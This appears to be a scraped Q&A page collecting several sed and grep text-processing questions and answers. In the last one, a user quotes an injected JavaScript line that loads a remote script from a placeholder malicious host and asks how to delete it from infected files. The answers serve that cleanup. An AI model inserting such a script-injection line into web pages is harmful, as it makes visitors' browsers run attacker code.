Removing characters from text file in Linux

Removing characters from text file in Linux - sed

I've just joined SO after watching from the outside for just over a year now. The reason I've finally joined is because I could do with some help :)
I have a text file with a list of email addresses. The email addresses are in the following format:
<firstinitial><surname>#domain.com
I'd like to edit the text file so the output gives me:
<firstinitial><first3lettersofsurname>#domain.com
I've tried using sed, but can seem to get this one. Any help would be much appreciated.
Many thanks,
Phill.

With GNU sed:
sed -E 's/(....).*(#.*)/\1\2/' file
.: matches a single character. Does not matter what character it is, except newline
*: matches preceding match zero or more times
\1: repeat the first capturing group (....)in the matched expression
\2: repeat the second capturing group (#.*)in the matched expression
See: The Stack Overflow Regular Expressions FAQ

Related

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.

This is purely a regex issue, by doing \S you requested to match non-white space characters within (..) but the failing case has a space between which does not comply with the grammar defined. Make it simple by explicitly calling out the characters to match inside (..) as [a-zA-Z ]* i.e. zero or more upper & lower case characters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use character classes [:alnum:] if you want numbers too
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'

sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally

Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no mater what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).

Changing a character in between patterns in vi/sed

I am struggling to work out how to get a , out from inbetween various patterns such as:
500,000
xyz ,CA
I have tried something like:
sed -E "s/\([a-zA-Z]*\),([a-zA-Z]*\)/\([a-zA-Z]*\) ([a-zA-Z]*\)/g" $file -i
It picks up the first pattern, but then over writes it with the second pattern, I feel like I am missing something very simple and I can't work it out, any help really appreciated.

You're missing the notion of capture groups, I think. To refer to a parenthesized portion of the search within the replacement string, use \1 for the first group, \2 for the second group, etc.
The modified line would be:
sed -E "s/([a-zA-Z]),([a-zA-Z])/\1 \2/g" $file -i
Rather than replacing the part that matches the first ([a-zA-Z]) with the literal text "([a-zA-Z])", this modified line just copies the matched portion into the output (and likewise for the second group).

Invalid reference \1 using sed when trying to print matching expression

Before I start, I already looked at this question, but it seems the solution was that they were not escaping the parentheses in their regex. I'm getting the same error, but I'm not grouping a regex. What I want to do is find all names/usernames in a lastlog file and return the UNs ONLY.
What I have:
s/^[a-z]+ |^[a-z]+[0-9]+/\1/p
I've seen many solutions that show how to do it in awk, which is great for future reference, but I want to do it using sed.
Edit for example input:
dzhu pts/15 n0000d174.cs.uts Wed Feb 17 08:31:22 -0600 2016
krobbins **Never logged in**
js24 **Never logged in**

You cannot use backreferences (such as \1) if you do not have any capture groups in the first part of your substitution command.
Assuming you want the first word in the line, here's a command you can run:
sed -n 's/^\s*\(\w\+\)\s\?.*/\1/p'
Explanation:
-n suppresses the default behavior of sed to print each line it processes
^\s* matches the start of the line followed by any number of whitespace
\(\w\+\) captures one or more word characters (letters and numbers)
\s\?.* matches one or zero spaces, followed by any number of characters. This is to make sure we match the whole word in the capture group
\1 replaces the matched line with the captured group
The p flag prints lines that matched the expression. Combined with -n, this means only matches get printed out.
I hope this helps!

Using sed to convert singular/plural words into uppercase

Using one sed command I'm trying to convert all occurrences of test and tests found in a .txt file into all caps. I also want to print only the converted lines, so I'm using -n. I've been playing around for it for over an hour. The problem is that I'm able to convert one or the other (either test or tests) but not both.
Any help would be so greatly appreciated. Thank you!

Use this
sed -e 's/tests/TESTS/g; s/test/TEST/g; T; p;' input.txt
The semicolons let you execute multiple commands.

This might work for you (GNU sed):
sed 's/\<tests\?\>/\U&/gp;d' file
This will uppercase words (\<....\>) that begin test with an optional s (s\?).

Sorry for the late response, but here is hopefully an understandable one with basic regex (no extended regex):
sed 's:\<test\(s*\)\>:TEST\1:g' < inputFile.txt > outputFile.txt; cat outputFile.txt | grep -n TEST
Explanation:
: delimiter (instead of usual /)
\<test\> matches test. The character before the first t can be any character except a letter, number or underscore. Same applies for the character after the last t.
\(\) remember what is inside the parenthesis.
s* match zero or more s's.
\1 used to insert first remembered match (i.e. any number of s's matched).
The rest is hopefully clear. Otherwise leave a comment.

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

We Keep Coding

iphone swift flutter scala powershell matlab mongodb postgresql perl eclipse

Removing characters from text file in Linux - sed

Related

Extracting substring from inside bracketed string, where the substring may have spaces

Changing a character in between patterns in vi/sed

Invalid reference \1 using sed when trying to print matching expression

Using sed to convert singular/plural words into uppercase

How to delete multiple lines from text file, including matched line?

Categories

Resources